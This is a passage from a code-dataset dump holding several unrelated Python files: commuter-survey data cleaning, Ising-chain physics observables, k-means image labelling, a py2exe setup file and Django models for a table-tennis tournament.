telework days\n if 'HowManyTeleworkDaysintwoweeks' in df:\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.astype(str)\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.apply(lambda x: x.lower())\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.str.replace('no days', '0')\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.str.replace(' days', '')\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.str.replace(' day', '')\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.str.replace('no answer/blank', '0')\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.str.replace('none', '0')\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.str.replace('nan', '0')\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.astype(float)\n\n # checks in on Telework\n if 'Teleworkinpasttwoweeks' in df.columns:\n df.Teleworkinpasttwoweeks = df.Teleworkinpasttwoweeks.str.replace('Yes', \"TeleworkedInPastTwoWeeks\")\n df.Teleworkinpasttwoweeks = df.Teleworkinpasttwoweeks.replace('No Answer/Blank', 0)\n df.Teleworkinpasttwoweeks = df.Teleworkinpasttwoweeks.str.replace('No', 'DidNotTeleworkInPastTwoWeeks')\n df.Teleworkinpasttwoweeks = df.Teleworkinpasttwoweeks.fillna(0)\n df = concatenateddf(df, 
'Teleworkinpasttwoweeks')\n # cleans up the work schedule column\n\n if 'SOVRecentDayDidYouPayToPark' in df:\n df['SOVRecentDayDidYouPayToPark'] = df['SOVRecentDayDidYouPayToPark'].str.replace('Yes', 'SOVPaidToParkMostRecentDay')\n df['SOVRecentDayDidYouPayToPark'] = df['SOVRecentDayDidYouPayToPark'].str.replace('No', 'SOVDidNotPayToParkMostRecentDay')\n df['SOVRecentDayDidYouPayToPark'] = df['SOVRecentDayDidYouPayToPark'].str.replace(\"I don't drive alone\", 'NeverSOVPayToParkMostRecentDay')\n df['SOVRecentDayDidYouPayToPark'] = df['SOVRecentDayDidYouPayToPark'].fillna(0)\n df = concatenateddf(df, 'SOVRecentDayDidYouPayToPark')\n if 'HowOftenDoYouTelework' in df:\n\n df['HowOftenDoYouTelework'] = df['HowOftenDoYouTelework'].str.replace(\"1 day/week\", 'TeleworkOnceAWeek')\n df['HowOftenDoYouTelework'] = df['HowOftenDoYouTelework'].str.replace(\"1-2 days/month\", 'TeleworkACoupleTimesAMonth')\n df['HowOftenDoYouTelework'] = df['HowOftenDoYouTelework'].str.replace(\"2 days/week\",'TeleworkTwiceAWeek')\n df['HowOftenDoYouTelework'] = df['HowOftenDoYouTelework'].str.replace(\"3 days/week\", 'TeleworkThriceAWeek')\n df['HowOftenDoYouTelework'] = df['HowOftenDoYouTelework'].str.replace(\"I don't telework\", 'TeleworkNever')\n df['HowOftenDoYouTelework'] = df['HowOftenDoYouTelework'].str.replace(\"Occasionally, on an as-needed basis\", 'TeleworkOccasionally')\n df['HowOftenDoYouTelework'] = df['HowOftenDoYouTelework'].str.replace(\"0\",'TeleworkNever')\n df = concatenateddf(df, 'HowOftenDoYouTelework')\n df.WorkSchedule = df.WorkSchedule.str.replace('3 days a week', 'WS_3days/week')\n df.WorkSchedule = df.WorkSchedule.str.replace('5 days a week', 'WS_5days/week')\n df.WorkSchedule = df.WorkSchedule.replace('No Answer/Blank', 0)\n df.WorkSchedule = df.WorkSchedule.str.replace('Other', 'WS_otherdays/week')\n df.WorkSchedule = df.WorkSchedule.str.replace('7 days in 2 weeks', 'WS_7days/2weeks')\n df.WorkSchedule = df.WorkSchedule.str.replace('4 days a weeks', 'WS_4tenhrdaysweek')\n df.WorkSchedule = df.WorkSchedule.str.replace('9 Days in 2 weeks', 'WS_9days/2weeks')\n df.WorkSchedule = df.WorkSchedule.str.replace(r\"\\(.*\\)\", \"\")\n df.WorkSchedule = df.WorkSchedule.str.strip()\n worksched = pd.get_dummies(df.WorkSchedule)\n df = pd.concat([worksched, df], axis=1)\n df = df.drop(\"WorkSchedule\", axis=1)\n # cleaning function for question 1, Employment Status\n worktime = pd.get_dummies(df['EmploymentStatus'])\n df = pd.concat([worktime, df], axis=1)\n df = df.drop('EmploymentStatus', axis=1)\n # turns typical week into a dummy variable\n df.TypicalWeek = df.TypicalWeek.str.replace('Yes', 'TypicalWeek')\n df.TypicalWeek = df.TypicalWeek.replace('No Answer/Blank', 0)\n df.TypicalWeek = df.TypicalWeek.str.replace('No', 'AtypicalWeek')\n typical = pd.get_dummies(df.TypicalWeek)\n df = pd.concat([typical, df], axis=1)\n df = df.drop('TypicalWeek', axis=1)\n # cleaning and transformation function for number of people in car or van pool\n df['PeopleInVanOrCarpool'] = df['PeopleInVanOrCarpool'].astype(str)\n df['PeopleInVanOrCarpool'] = df['PeopleInVanOrCarpool'].apply(lambda x: x.lower())\n df['PeopleInVanOrCarpool'] = df['PeopleInVanOrCarpool'].str.replace(' persons', \"\")\n df['PeopleInVanOrCarpool'] = df['PeopleInVanOrCarpool'].str.replace(' person', \"\")\n df['PeopleInVanOrCarpool'] = df['PeopleInVanOrCarpool'].str.replace(' people', \"\")\n df['PeopleInVanOrCarpool'] = df['PeopleInVanOrCarpool'].str.replace('no answer/blank', '0')\n df['PeopleInVanOrCarpool'] = 
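Most of the cleaning functions above repeat one idiom, wrapped in `concatenateddf()`: one-hot encode a categorical column with `pd.get_dummies`, prepend the dummy columns, and drop the original. Isolated with toy values:

```python
import pandas as pd

# The recurring pattern above: dummy-encode, concatenate, drop (toy data).
df = pd.DataFrame({'PayforParking': ['PaidforParking',
                                     'DidNotPayforParking',
                                     'PaidforParking']})

dummies = pd.get_dummies(df['PayforParking'])
df = pd.concat([dummies, df], axis=1).drop('PayforParking', axis=1)
print(df.columns.tolist())  # ['DidNotPayforParking', 'PaidforParking']
```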
df['PeopleInVanOrCarpool'].str.replace('nan', '0')\n df['PeopleInVanOrCarpool'] = df['PeopleInVanOrCarpool'].astype(float)\n df = df.replace('Yes', 1)\n df = df.replace('No', 0)\n df = df.replace('No Answer/Blank', 0)\n df = df.drop(0, axis = 1)\n return df\ndef Main(filename):\n df = connecttodb(sqlscripts.sqlscript1, sqlscripts.sqlscript2)\n df = changecolumnnames(df, sqlscripts.labelcoding)\n df = fixtranstype(df)\n df = fixattitudinaldata(df)\n df = cleaning_function(df)\n df = categoricaltransitdata(df)\n df.to_csv(filename)\nif __name__ == \"__main__\":\n Main(r'C:\\Users\\SchumeN\\Documents\\I5wideningproject\\whatcomctrdataraw.csv')","sub_path":"ctrexportdata.py","file_name":"ctrexportdata.py","file_ext":"py","file_size_in_byte":12096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"405814522","text":"import re\n\nimport torch\nfrom torch.distributions.utils import log_sum_exp\n\n__all__ = [\n \"Observable\",\n \"TFIMChainEnergy\",\n \"TFIMChainMagnetization\"\n]\n\n\ndef format_alias(s):\n alias = s.strip(' _')\n if \" \" not in alias:\n # cf. https://stackoverflow.com/a/1176023\n alias = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', alias)\n alias = re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', alias)\n else:\n alias = format_alias(alias.strip(' _')\n .replace(' ', '_'))\n\n return (alias.lower()\n .strip(' _')\n .replace('__', '_')\n .replace(' ', ''))\n\n\ndef to_pm1(samples):\n return samples.mul(2.).sub(1.)\n\n\ndef to_01(samples):\n return samples.add(1.).div(2.)\n\n\nclass Observable:\n def __init__(self, name=None, variance_name=None, **kwargs):\n self.name = name\n self.mean_name = name if name else \"mean\"\n\n if variance_name: # alias the variance function\n # if someone manages to put in a mangled enough string to\n # break this...they brought it on themselves\n variance_alias = format_alias(variance_name)\n setattr(self, variance_alias, self.variance)\n self.variance_name = variance_name\n else:\n self.variance_name = \"variance\"\n\n def apply(self, samples, sampler):\n pass\n\n def sample(self, sampler, num_samples, observable=None, **kwargs):\n if observable is None:\n observable = self.name\n return self.apply(sampler.sample(num_samples, sampler=sampler, observable=observable, **kwargs), sampler)\n\n def expected_value(self, sampler, num_samples, batch_size=0, **kwargs):\n stats = self.statistics(sampler, num_samples, batch_size, **kwargs)\n return stats[\"mean\"]\n\n def variance(self, sampler, num_samples, batch_size=0, **kwargs):\n stats = self.statistics(sampler, num_samples, batch_size, **kwargs)\n return stats[\"variance\"]\n\n def statistics(self, sampler, num_samples, batch_size, **kwargs):\n batch_size = num_samples if batch_size <= 0 else batch_size\n num_reg_batches, rem = divmod(num_samples, batch_size)\n batches = [batch_size] * num_reg_batches\n if rem != 0:\n batches.append(rem)\n\n def update_statistics(avg_a, var_a, len_a, avg_b, var_b, len_b):\n if len_a == len_b == 0:\n return 0.0\n\n new_len = len_a + len_b\n new_mean = ((avg_a * len_a) + (avg_b * len_b)) / new_len\n\n delta = avg_b - avg_a\n scaled_var_a = var_a * (len_a - 1)\n scaled_var_b = var_b * (len_b - 1)\n\n new_var = scaled_var_a + scaled_var_b\n new_var += ((delta ** 2) * len_a * len_b / float(new_len))\n new_var /= float(new_len - 1)\n\n return new_mean, new_var, new_len\n\n running_mean = 0.0\n running_var = 0.0\n running_length = 0\n\n for batch_size in batches:\n samples = self.sample(sampler, batch_size, **kwargs)\n batch_mean = 
samples.mean().item()\n batch_var = samples.var().item()\n\n running_mean, running_var, running_length = \\\n update_statistics(running_mean, running_var, running_length,\n batch_mean, batch_var, batch_size)\n\n return {\n \"mean\": running_mean,\n \"variance\": running_var\n }\n\n\nclass TFIMChainEnergy(Observable):\n def __init__(self, h, density=True, name=\"Energy\",\n variance_name=\"Heat Capacity\", **kwargs):\n super(TFIMChainEnergy, self).__init__(name=name,\n variance_name=variance_name)\n self.h = h\n self.density = density\n\n @staticmethod\n def _flip_spin(i, s):\n s[:, i] *= -1.0\n\n def apply(self, samples, sampler):\n samples = to_pm1(samples)\n log_psis = sampler.rbm_module.effective_energy(to_01(samples)).div(2.)\n\n shape = log_psis.shape + (samples.shape[-1],)\n log_flipped_psis = torch.zeros(*shape,\n dtype=torch.double,\n device=sampler.rbm_module.device)\n\n for i in range(samples.shape[-1]): # sum over spin sites\n self._flip_spin(i, samples) # flip the spin at site i\n log_flipped_psis[:, i] = sampler.rbm_module.effective_energy(\n to_01(samples)\n ).div(2.)\n self._flip_spin(i, samples) # flip it back\n\n log_flipped_psis = log_sum_exp(\n log_flipped_psis, keepdim=True).squeeze()\n\n interaction_terms = ((samples[:, :-1] * samples[:,1:]).sum(1) +\n samples[:,0] * samples[:,samples.shape[-1]-1])\n # sum over spin sites\n \n transverse_field_terms = (log_flipped_psis\n .sub(log_psis)\n .exp()) # convert to ratio of probabilities\n\n energy = (transverse_field_terms\n .mul(self.h)\n .add(interaction_terms)\n .mul(-1.))\n\n if self.density:\n return energy.div(samples.shape[-1])\n else:\n return energy\n\n\nclass TFIMChainMagnetization(Observable):\n def __init__(self, name=\"Magnetization\",\n variance_name=\"Susceptibility\", **kwargs):\n super(TFIMChainMagnetization, self).__init__(\n name=name, variance_name=variance_name)\n\n def apply(self, samples, sampler=None):\n return (to_pm1(samples)\n .mean(1)\n .abs())\n","sub_path":"examples/observables_tutorial.py","file_name":"observables_tutorial.py","file_ext":"py","file_size_in_byte":5682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"277862738","text":"import numpy as np\nfrom imageio import imread, imwrite\nfrom sklearn.cluster import KMeans\nfrom model_data import Model_data\nimport glob\n\npath = 'labels/imgs/'\nim_reg = '*.png'\n\nimages = []\nim_paths = []\n\nfor im in glob.glob(path + im_reg):\n # if len(images) > 1:\n # break\n if \"anno\" not in im:\n images.append(imread(im)[:, :, 0].reshape(1024, 1024, 1, 1))\n im_paths.append(im)\n\n\nn = len(images)\n\ndatam = Model_data(kernel_size=(11, 11, 1), flat_features=True)\n\nXtrain, ytrain = datam.handle_images(images)\nsub_Xtrain = Xtrain[np.random.choice(Xtrain.shape[0], 3000000, False)]\nprint(Xtrain.shape)\nprint(n)\n\nmodel = KMeans(n_clusters=16, n_jobs=6, verbose=0)\nmodel.fit(sub_Xtrain)\npred = model.predict(Xtrain)\npred = pred.reshape((n, 1024, 1024))\nfor i in range(pred.shape[0]):\n fname = \"%s_kmeans_anno.png\" % (im_paths[i])\n imwrite(fname, pred[i])\n","sub_path":"labels/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"320639098","text":"__author__ = 'LMai'\nfrom distutils.core import setup\nimport py2exe\n\n# setup(console=['etf_upload.py'],\n# options={\"py2exe\": {\"includes\": \"decimal\"}})\n\nsetup(\n options={'py2exe': {'bundle_files': 1, 
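The `update_statistics` closure above merges per-batch means and sample variances with the pairwise (Chan) update, so `statistics()` never needs all samples in memory at once. The same rule, checked against numpy on toy data:

```python
import numpy as np

# Pairwise merge of (mean, sample variance, count), as in update_statistics().
def merge(avg_a, var_a, n_a, avg_b, var_b, n_b):
    n = n_a + n_b
    mean = (avg_a * n_a + avg_b * n_b) / n
    delta = avg_b - avg_a
    var = var_a * (n_a - 1) + var_b * (n_b - 1)
    var += delta ** 2 * n_a * n_b / n
    var /= n - 1
    return mean, var, n

rng = np.random.default_rng(1)
x = rng.normal(size=1000)
a, b = x[:400], x[400:]

m, v, _ = merge(a.mean(), a.var(ddof=1), len(a), b.mean(), b.var(ddof=1), len(b))
assert np.isclose(m, x.mean()) and np.isclose(v, x.var(ddof=1))
print(m, v)
```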
'compressed': True, 'includes': 'decimal'}\n ,'packages': ['elementtree', 'xml']\n },\n console=[{'script': \"etf_upload.py\"}],\n zipfile=None,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"551505223","text":"from itertools import cycle, chain\nimport string\nfrom collections import defaultdict\n\nfrom django.core.urlresolvers import reverse\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.utils import timezone\nfrom django.utils.safestring import mark_safe\nfrom django.utils.timezone import now\nfrom django.utils.translation import ugettext_lazy as _\nfrom unidecode import unidecode\n\nfrom pingpong.helpers import berger_tables, shuffled\n\n\nclass XOR_Q:\n def __xor__(self, other):\n not_self = self.clone()\n not_other = other.clone()\n not_self.negate()\n not_other.negate()\n\n x = self & not_other\n y = not_self & other\n\n return x | y\n\n\nQ.__bases__ += (XOR_Q, )\n\nGENDER_CHOICES = (\n (0, _(\"Male\")),\n (1, _(\"Female\")),\n)\n\n\nclass Player(models.Model):\n class Meta:\n verbose_name = _(\"player\")\n verbose_name_plural = _(\"players\")\n\n name = models.CharField(_(\"name\"), max_length=50)\n surname = models.CharField(_(\"surname\"), max_length=50)\n\n gender = models.IntegerField(_(\"gender\"), choices=GENDER_CHOICES, null=True)\n\n club = models.CharField(_(\"club\"), max_length=50, blank=True)\n category = models.ForeignKey('Category', verbose_name=_(\"category\"), related_name='players', blank=True, null=True)\n\n def save(self, *args, **kwargs):\n self.fill_gender()\n\n super(Player, self).save(*args, **kwargs)\n\n def fill_gender(self):\n if self.category is None:\n return\n\n if self.gender is None:\n self.gender = self.category.gender\n\n def __unicode__(self):\n return self.full_name()\n\n def full_name(self):\n return u\"{} {}\".format(self.surname, self.name)\n\n full_name.admin_order_field = 'surname'\n\n\nclass Category(models.Model):\n SINGLE = 0\n DOUBLE = 1\n TYPE_CHOICES = (\n (SINGLE, _(\"Single\")),\n (DOUBLE, _(\"Double\")),\n )\n\n class Meta:\n verbose_name = _(\"category\")\n verbose_name_plural = _(\"categories\")\n\n name = models.CharField(_(\"name\"), max_length=10)\n description = models.CharField(_(\"description\"), max_length=50, blank=True)\n\n type = models.IntegerField(_(\"type\"), choices=TYPE_CHOICES, default=0)\n\n gender = models.IntegerField(_(\"gender\"), choices=GENDER_CHOICES, null=True)\n min_age = models.IntegerField(_(\"min age\"), blank=True, null=True)\n max_age = models.IntegerField(_(\"max age\"), blank=True, null=True)\n\n def create_groups(self, leaders=(), number_of_groups=0):\n Group.objects.filter(category=self).delete()\n\n if number_of_groups == 0:\n number_of_groups = len(leaders)\n\n if number_of_groups == 0:\n raise ValueError(\"You have to specify leaders or non zero number of groups.\")\n\n groups = [Group.objects.create(name=string.ascii_uppercase[i], category=self)\n for i in range(number_of_groups)]\n has_leader = {group: False for group in groups}\n clubs = {group: set() for group in groups}\n members = []\n\n leader_ids = set(l.id for l in leaders)\n other_players = list(shuffled(self.players.exclude(id__in=leader_ids)))\n first_skipped_player = None\n group_iterator = iter(cycle(groups))\n group = next(group_iterator)\n for player in chain(leaders, other_players):\n if player in leaders or player == first_skipped_player or player.club 
not in clubs[group]:\n is_leader = not has_leader[group]\n if is_leader:\n has_leader[group] = True\n members.append(GroupMember(player=player, group=group, leader=is_leader))\n if player.club:\n clubs[group].add(player.club)\n first_skipped_player = None\n group = next(group_iterator)\n else:\n if first_skipped_player is None:\n first_skipped_player = player\n other_players.append(player)\n\n GroupMember.objects.bulk_create(members)\n group_members = defaultdict(list)\n for member in GroupMember.objects.filter(group__category=self).select_related('group'):\n group_members[member.group].append(member)\n\n matches = []\n for group in groups:\n for p1, p2 in berger_tables(len(group_members[group])):\n matches.append(Match(player1=group_members[group][p1].player,\n player2=group_members[group][p2].player,\n group=group,\n status=Match.PENDING))\n\n # Create a dummy match that will be used to assign table to the group.\n matches.append(Match(group=group, status=Match.READY))\n Match.objects.bulk_create(matches)\n\n def __unicode__(self):\n return self.name\n\n\nclass Table(models.Model):\n name = models.CharField(max_length=50)\n short_name = models.CharField(max_length=10, default=\"\")\n display_order = models.IntegerField()\n\n def __unicode__(self):\n return self.name\n\n _players = None\n\n @property\n def players(self):\n if self._players is None:\n if self.bracketslot_set.exists():\n self._players = sorted([bracket.player for bracket in self.bracketslot_set.all()],\n key=lambda x: x.id if hasattr(x, 'id') else '')\n elif self.group_set.exists():\n group = self.group_set.all()[0]\n self._players = group.category.description, group.name\n else:\n self._players = ('', '')\n\n return self._players\n\n def player1(self):\n return self.players[0]\n\n def player2(self):\n return self.players[1]\n\n def occupied(self):\n return self.players != ('', '')\n\n def match_started(self):\n if self.bracketslot_set.exists():\n return self.bracketslot_set.all()[0].match_start.strftime('%H:%M')\n else:\n return ''\n\n _current_matches = None\n\n def current_matches(self):\n if self._current_matches is None:\n self._current_matches = self.all_matches.filter(status=Match.PLAYING)\n return self._current_matches\n\n\nclass Match(models.Model):\n PENDING = 0\n READY = 1\n PLAYING = 2\n COMPLETE = 3\n DOUBLE = 4\n\n STATUS_CHOICES = (\n (PENDING, 'Pending'),\n (READY, 'Ready'),\n (PLAYING, 'Playing'),\n (COMPLETE, 'Complete'),\n (COMPLETE, 'Double'),\n )\n\n class Meta:\n verbose_name = _(\"Match\")\n verbose_name_plural = _(\"Matches\")\n\n status = models.IntegerField(choices=STATUS_CHOICES, default=0)\n\n group = models.ForeignKey('Group', null=True)\n\n player1 = models.ForeignKey(Player, null=True, related_name='match_as_player1')\n player1_score = models.IntegerField(null=True)\n player1_bracket_slot = models.ForeignKey('BracketSlot', null=True, related_name='+')\n\n player2 = models.ForeignKey(Player, null=True, related_name='match_as_player2')\n player2_score = models.IntegerField(null=True)\n player2_bracket_slot = models.ForeignKey('BracketSlot', null=True, related_name='+')\n\n table = models.ForeignKey(Table, blank=True, null=True, related_name='all_matches')\n\n ready_time = models.DateTimeField(null=True)\n start_time = models.DateTimeField(null=True)\n end_time = models.DateTimeField(null=True)\n\n def set_score(self, player1_score, player2_score):\n self.player1_score = player1_score\n self.player2_score = player2_score\n self.player1_bracket_slot.score = player1_score\n 
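`create_groups` above schedules group matches via `berger_tables` from `pingpong.helpers`, whose implementation is not shown here. The sketch below is an assumed, minimal circle-method round-robin with a similar interface (given a player count, yield index pairs so everyone meets everyone once), not the project's actual helper:

```python
# Assumed stand-in for pingpong.helpers.berger_tables: circle-method round robin.
def round_robin_pairs(n):
    players = list(range(n)) + ([None] if n % 2 else [])  # pad odd counts with a bye
    half = len(players) // 2
    for _ in range(len(players) - 1):
        for a, b in zip(players[:half], reversed(players[half:])):
            if a is not None and b is not None:
                yield (a, b) if a < b else (b, a)
        # rotate everyone except the first player
        players = [players[0]] + [players[-1]] + players[1:-1]

print(sorted(round_robin_pairs(4)))
# [(0, 1), (0, 2), (0, 3), (1, 2), (1, 3), (2, 3)]
```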
self.player1_bracket_slot.save()\n self.player2_bracket_slot.score = player2_score\n self.player2_bracket_slot.save()\n\n def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None):\n if self.status == Match.PENDING:\n if self.player1_id and self.player2_id:\n self.status = Match.READY\n elif self.status == Match.READY or self.status == Match.DOUBLE:\n if self.table_id is not None:\n self.start_time = now()\n self.status = Match.PLAYING\n elif self.status == Match.PLAYING:\n if self.player1_score is not None and self.player2_score is not None:\n if self.player1_bracket_slot_id:\n self.player1_bracket_slot.score = self.player1_score\n self.player1_bracket_slot.save()\n if self.player2_bracket_slot_id:\n self.player2_bracket_slot.score = self.player2_score\n self.player2_bracket_slot.save()\n self.end_time = now()\n self.status = Match.COMPLETE\n super(Match, self).save(force_insert, force_update, using, update_fields)\n\n @staticmethod\n def ready_group_matches():\n group_matches = Match.objects.filter(status=Match.READY, group__isnull=False)\n return group_matches.select_related('group', 'group__category')\n\n @staticmethod\n def ready_bracket_matches():\n return Match.objects \\\n .filter(status=Match.READY, group__isnull=True) \\\n .order_by('id') \\\n .select_related('player1', 'player1__category', 'player1_bracket_slot__bracket',\n 'player2') \\\n\n @staticmethod\n def ready_doubles_matches():\n occupied_with_singles = Double.objects.filter(\n Q(player1__match_as_player1__status__lt=Match.COMPLETE) |\n Q(player1__match_as_player2__status__lt=Match.COMPLETE) |\n Q(player2__match_as_player1__status__lt=Match.COMPLETE) |\n Q(player2__match_as_player2__status__lt=Match.COMPLETE)).values('id')\n\n return Match.objects.filter(status=Match.DOUBLE).exclude(\n Q(player1__isnull=True) | Q(player2__isnull=True) |\n Q(player1__in=occupied_with_singles) |\n Q(player2__in=occupied_with_singles)).select_related('player1', 'player1__double',\n 'player1__category',\n 'player2', 'player2__double',\n 'player1_bracket_slot__bracket')\n\n @staticmethod\n def current_matches():\n return Match.objects.filter(status=Match.PLAYING, group__isnull=True)\n\n def description(self):\n if self.group is not None:\n return unicode(self.group)\n elif self.player1 and self.player2:\n b = self.player1_bracket_slot.bracket.name[0]\n l = self.player1_bracket_slot.level\n c = self.player1.category.name\n return mark_safe(u'%s %s %s %s : %s' % (b, l, c, self.player1, self.player2))\n else:\n return u\"\"\n\n def __unicode__(self):\n return u'%s %s' % (self.player1, self.player2)\n\n\nclass Double(Player):\n player1 = models.ForeignKey(Player, related_name='+')\n player2 = models.ForeignKey(Player, related_name='+')\n\n def save(self, *args, **kwargs):\n self.name = '%s. %s' % (self.player1.name[0], self.player1.surname)\n self.surname = '%s. 
%s' % (self.player2.name[0], self.player2.surname)\n super(Double, self).save(*args, **kwargs)\n\n\nclass Group(models.Model):\n STATUS = (\n (0, ''),\n (1, 'playing'),\n (2, 'completed')\n )\n\n name = models.CharField(max_length=10)\n category = models.ForeignKey(Category)\n\n table = models.ForeignKey(Table, blank=True, null=True)\n status = models.IntegerField(choices=STATUS, default=0)\n\n @property\n def members(self):\n return GroupMember.objects.filter(group=self) \\\n .order_by('place', '-leader', 'player__surname') \\\n .select_related('group', 'group__category', 'player')\n\n @property\n def match(self):\n return Match.objects.filter(group=self, player1=None, player2=None)\n\n def assign_table(self, table):\n Match.objects.filter(group=self).update(table=table,\n status=Match.PLAYING,\n start_time=now())\n\n def __unicode__(self):\n return u'{} - Skupina {}'.format(self.category, self.name)\n\n\nclass GroupMember(models.Model):\n player = models.ForeignKey(Player)\n group = models.ForeignKey(Group, related_name='members')\n\n place = models.IntegerField(blank=True, null=True)\n leader = models.BooleanField(default=False)\n\n @classmethod\n def for_category(cls, category):\n return cls.objects.filter(group__category=category) \\\n .order_by('group', 'place', '-leader', 'player__surname') \\\n .prefetch_related('group', 'group__category', 'player')\n\n @classmethod\n def for_group(cls, group):\n return cls.objects.filter(group=group) \\\n .order_by('-leader', 'player__surname') \\\n .prefetch_related('player')\n\n def __unicode__(self):\n return unicode(self.player)\n\n def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None):\n super(GroupMember, self).save(force_insert, force_update, using, update_fields)\n\n if self.place:\n for slot in BracketSlot.objects.filter(transition__group=self.group_id, transition__place=self.place):\n slot.player_id = self.player_id\n slot.save()\n\n\nclass KnownPlayer(models.Model):\n name = models.CharField(_(\"name\"), max_length=50)\n search_name = models.CharField(_(\"searchable name\"), max_length=50)\n surname = models.CharField(_(\"surname\"), max_length=50)\n search_surname = models.CharField(_(\"searchable surname\"), max_length=50)\n club = models.CharField(_(\"club\"), max_length=50, blank=True)\n\n def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None):\n if update_generated_value(self, 'name', 'search_name'):\n self.search_name = unidecode(self.name)\n if update_generated_value(self, 'surname', 'search_surname'):\n self.search_surname = unidecode(self.surname)\n super(KnownPlayer, self).save(force_insert, force_update, using, update_fields)\n\n def __unicode__(self):\n return u'%s %s [%s]' % (self.name, self.surname, self.club)\n\n\nclass KnownClub(models.Model):\n name = models.CharField(_(\"name\"), max_length=50)\n search_name = models.CharField(_(\"searchable name\"), max_length=50)\n\n def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None):\n if update_generated_value(self, 'name', 'search_name'):\n self.search_name = unidecode(self.name)\n super(KnownClub, self).save(force_insert, force_update, using, update_fields)\n\n def __unicode__(self):\n return self.name\n\n\ndef update_generated_value(model, field, cleaned_field):\n new_value = getattr(model, field, \"\")\n cleaned_new_value = getattr(model, cleaned_field, \"\")\n if not cleaned_new_value:\n return True\n\n if model.pk is None:\n return False\n old_model = 
model.__class__.objects.get(pk=model.pk)\n old_value = getattr(old_model, field, \"\")\n cleaned_old_value = getattr(old_model, cleaned_field, \"\")\n\n if new_value == old_value:\n return False\n\n if cleaned_old_value == unidecode(old_value):\n if cleaned_new_value == cleaned_old_value:\n return True\n return False\n\n\nclass Bracket(models.Model):\n category = models.ForeignKey(Category)\n name = models.CharField(max_length=100)\n description = models.CharField(max_length=50)\n\n levels = models.IntegerField(default=0)\n\n def __unicode__(self):\n return '%s - %s' % (self.category.name, self.name)\n\n\nclass BracketSlot(models.Model):\n STATUS = (\n (0, ''),\n (1, 'playing'),\n (2, 'completed')\n )\n\n bracket = models.ForeignKey(Bracket)\n level = models.IntegerField()\n status = models.IntegerField(choices=STATUS, default=0)\n\n no_player = models.BooleanField(default=False)\n player = models.ForeignKey(Player, blank=True, null=True)\n table = models.ForeignKey(Table, blank=True, null=True)\n score = models.IntegerField(null=True, blank=True)\n\n match_start = models.DateTimeField(null=True, blank=True)\n match_end = models.DateTimeField(null=True, blank=True)\n\n winner_goes_to = models.ForeignKey('BracketSlot', null=True, blank=True, related_name='winner_set')\n loser_goes_to = models.ForeignKey('BracketSlot', null=True, blank=True, related_name='loser_set')\n\n def save(self, *args, **kwargs):\n self.set_status()\n super(BracketSlot, self).save(*args, **kwargs)\n\n if self.player_id:\n for match in Match.objects.filter(player1_bracket_slot=self):\n if match.player1_id != self.player_id:\n match.player1_id = self.player_id\n match.save()\n for match in Match.objects.filter(player2_bracket_slot=self):\n if match.player2_id != self.player_id:\n match.player2_id = self.player_id\n match.save()\n self.advance_player()\n\n def set_status(self):\n if self.table_id is not None and self.status != 1:\n self.status = 1\n self.match_start = timezone.now()\n\n if self.score is not None and self.status != 2:\n self.table = None\n self.status = 2\n self.match_end = timezone.now()\n\n if self.level == 0 and self.player_id is not None:\n self.status = 2\n\n def advance_player(self):\n if self.player_id is None:\n return\n other = BracketSlot.objects.exclude(id=self.id) \\\n .filter(winner_goes_to=self.winner_goes_to) \\\n .select_related('winner_goes_to', 'loser_goes_to')[0]\n if other.no_player:\n other.winner_goes_to.player_id = self.player_id\n other.winner_goes_to.save()\n\n if self.score is not None and other.score is not None:\n first, last = (self, other) if self.score > other.score else (other, self)\n if first.winner_goes_to is not None:\n first.winner_goes_to.player_id = first.player_id\n first.winner_goes_to.save()\n if last.loser_goes_to is not None:\n last.loser_goes_to.player_id = last.player_id\n last.loser_goes_to.save()\n\n def label(self):\n try:\n transition = '%s%s' % (self.transition.group.name, self.transition.place)\n except GroupToBracketTransition.DoesNotExist:\n transition = ' '\n try:\n player = self.player.full_name() if self.player is not None else ' '\n except Player.DoesNotExist:\n player = ' '\n\n return transition, player\n\n def empty(self):\n return self.transition is None and self.player is None\n\n def get_admin_url(self):\n return reverse(\"admin:%s_%s_change\" % (self._meta.app_label, self._meta.module_name), args=(self.id,))\n\n def __unicode__(self):\n return '%s' % self.id\n\n\nclass GroupToBracketTransition(models.Model):\n group = 
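The intent of `update_generated_value` above is to regenerate an ASCII search field only while it is still auto-derived, so a manual override survives later edits. A simplified standalone restatement of that decision (function name and signature are mine, not the model's):

```python
from unidecode import unidecode

# Simplified restatement of the update_generated_value() decision above.
def should_regenerate(old_value, stored_search, new_value):
    if not stored_search:
        return True                    # nothing stored yet: derive it
    if new_value == old_value:
        return False                   # source field unchanged
    # regenerate only if the stored value was still the auto-derived form
    return stored_search == unidecode(old_value)

print(should_regenerate("Šimon", "Simon", "Nováček"))    # True: still auto-derived
print(should_regenerate("Šimon", "SIMON-X", "Nováček"))  # False: manual override kept
```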
